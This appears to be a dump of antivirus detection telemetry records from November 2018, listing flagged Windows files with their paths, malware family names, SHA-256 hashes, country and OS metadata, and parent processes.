  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='checkmate.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-CU4QE.tmp\\Checkmate.exe', filesize=1024000, name='Adware/CsdiMonetize.udgxz.#M1.#R1'), hash='3cf92b23871c00df72e252f8aa0fb6d33aa1ce37796088d40e0a1f2e0a936660', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:29:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042709-2867b362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd505e43\\AVSCAN-20181102-042454-163631FB\\AVSCAN-20181102-042709-2867B362', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010613', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010613', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6be026ee27f269917b7307db9f47e38c3dfb5a07ba6d4351cde088fc07fe6db1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6BE026EE27F269917B7307DB9F47E38C3DFB5A07BA6D4351CDE088FC07FE6DB1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6be026ee27f269917b7307db9f47e38c3dfb5a07ba6d4351cde088fc07fe6db1', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:16:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ammo.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\AMMO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152856-b5c1740e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-152727-A42EE1EF\\AVSCAN-20181102-152856-B5C1740E', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T19:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155937-eac2eca3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155937-EAC2ECA3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (1).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T01:54:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minesweeper.exe', filepath='C:\\Program Files\\Microsoft Games\\Minesweeper\\MineSweeper.exe', filesize=896000, name='TR/Patched.Gen.#M300.#R5151'), hash='139e27c07d6903cc24911217be4dddee25e3be5dfe8142b082e6b8ee43da0cbb', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:53:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T07:55:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rank_comps.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rank_Comps\\Rank_Comps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103532-8f5f45dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5ce2e820\\AVSCAN-20181102-103439-8B4182C6\\AVSCAN-20181102-103532-8F5F45DC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='firefox8_integration[1].html', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\E4BPMV74\\firefox8_integration[1].html', filesize=232000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='0deefadd6ab11ecf8248acb182649d5eb80e9f54e1df1795ca70fa53b184397f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T07:13:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Professional EGR Remover\\Professional EGR Remover.EXE', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Music\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Music\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231449-2bd4c7b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a324cd\\AVSCAN-20181102-231211-13EC6DC1\\AVSCAN-20181102-231449-2BD4C7B2', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:14:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:05:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X7E2XT0Z\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\VSSVC.exe', parentsize=None, timestamp='2018-11-02T00:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='elodrawmultimon.exe', filepath='C:\\Program Files\\Elo Touch Solutions\\EloDrawMultiMon.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='6fe70782008b47c5ca536cdac011b4fb40787feee4d8b9ec873879c303b33c75', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T22:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055249-8052cfe7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055249-8052CFE7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mss.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MSS\\MSS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='73c18cbaed5b72e91c293bb70286ab85930974b6506bb75dd1c85b9728e9d665', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f71', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f71', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060103-a671ddda', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060103-A671DDDA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050328-9b4d0525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050328-9B4D0525', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061927-38b2a61b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061927-38B2A61B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153525-da2ff93e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-153525-DA2FF93E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.485\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.485\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050747-35dfa65d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050747-35DFA65D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055821-4627cc5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055821-4627CC5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050237-7cd271d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050237-7CD271D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061211-34c1f021', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061211-34C1F021', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='toshiba.exe', filepath='C:\\Users\\X\\Toshiba\\Toshiba.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:58:27Z'), dt=datetime.date(2018, 11, 2)),
